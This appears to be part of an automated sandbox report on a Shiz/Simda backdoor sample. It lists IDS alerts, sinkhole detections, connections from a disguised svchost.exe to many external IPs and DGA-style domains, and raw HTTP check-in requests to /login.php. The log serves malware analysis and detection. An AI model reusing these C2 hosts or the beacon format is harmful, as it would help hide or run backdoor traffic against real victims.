      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51130 -> 154.85.183.50:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51125 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49652 -> 3.94.10.34:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49652 -> 3.94.10.34:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50749 -> 64.225.91.73:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50749 -> 64.225.91.73:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49660 -> 154.212.231.82:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49660 -> 154.212.231.82:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49656 -> 91.195.240.19:80
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49652
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49652
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51130 -> 154.85.183.50:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51122 -> 13.248.169.48:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51122 -> 13.248.169.48:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51112 -> 103.150.11.230:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51112 -> 103.150.11.230:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50750 -> 72.52.179.174:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50750 -> 72.52.179.174:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:63803 -> 52.34.198.229:80
      Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:56536
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:63803 -> 52.34.198.229:80
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.4:63803
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.4:63803
      Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:61998
      Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:54206
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51124 -> 64.225.91.73:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51124 -> 64.225.91.73:80
      Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:54974
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64272 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64272 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64277 -> 3.94.10.34:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64277 -> 3.94.10.34:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50116 -> 64.225.91.73:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50116 -> 64.225.91.73:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50751 -> 72.52.179.174:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50751 -> 72.52.179.174:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64301 -> 103.224.182.252:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64301 -> 103.224.182.252:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64284 -> 5.79.71.225:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64284 -> 5.79.71.225:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64298 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64288 -> 5.79.71.225:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64275 -> 69.162.80.60:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64275 -> 69.162.80.60:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64273 -> 162.255.119.102:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64288 -> 5.79.71.225:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64273 -> 162.255.119.102:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64285 -> 91.195.240.19:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64298 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49517 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49517 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64290 -> 188.114.97.3:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56389 -> 199.191.50.83:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56389 -> 199.191.50.83:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64290 -> 188.114.97.3:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:63308 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64271 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64271 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64283 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64303 -> 154.85.183.50:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:63308 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64283 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64303 -> 154.85.183.50:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64299 -> 15.197.240.20:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64299 -> 15.197.240.20:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56386 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56386 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64276 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50118 -> 72.52.179.174:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50118 -> 72.52.179.174:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56388 -> 208.100.26.245:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56388 -> 208.100.26.245:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64276 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56396 -> 91.195.240.19:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56399 -> 154.212.231.82:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56399 -> 154.212.231.82:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50027 -> 52.34.198.229:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50027 -> 52.34.198.229:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64291 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64291 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64302 -> 103.224.212.210:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64302 -> 103.224.212.210:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64274 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64274 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56393 -> 69.162.80.58:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56393 -> 69.162.80.58:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64292 -> 103.150.11.230:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64292 -> 103.150.11.230:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56387 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56387 -> 18.208.156.248:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56390 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56390 -> 44.221.84.105:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56383 -> 162.255.119.102:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56383 -> 162.255.119.102:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64306 -> 15.197.240.20:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64306 -> 15.197.240.20:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56394 -> 85.17.31.122:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56394 -> 85.17.31.122:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64289 -> 13.248.169.48:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64289 -> 13.248.169.48:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50117 -> 72.52.179.174:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50117 -> 72.52.179.174:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64297 -> 13.248.169.48:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64297 -> 13.248.169.48:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64300 -> 64.225.91.73:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64300 -> 64.225.91.73:80
      Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:53545
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56395 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56395 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56385 -> 188.114.96.3:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56385 -> 188.114.96.3:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56398 -> 85.17.31.122:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56398 -> 85.17.31.122:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56391 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56391 -> 172.234.222.143:80
      Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:61952
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56392 -> 3.94.10.34:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56392 -> 3.94.10.34:80
      Source: Network trafficSuricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56384 -> 3.64.163.50:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56384 -> 3.64.163.50:80
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49661 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51114 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64278 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56397 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64293 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64296 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56400 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49654 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64286 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51121 -> 188.114.97.3:443
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 15.197.240.20 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: lysynur.com
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 172.234.222.143 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 69.162.80.60 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 5.79.71.225 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: gaqypiz.com
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.137.66 8001Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: pufyjag.com
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: galyqoh.com
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.226 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.11.230 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.64.163.50 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 91.195.240.19 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 162.255.119.102 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 85.17.31.122 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 69.162.80.58 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: gacyzuh.com
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
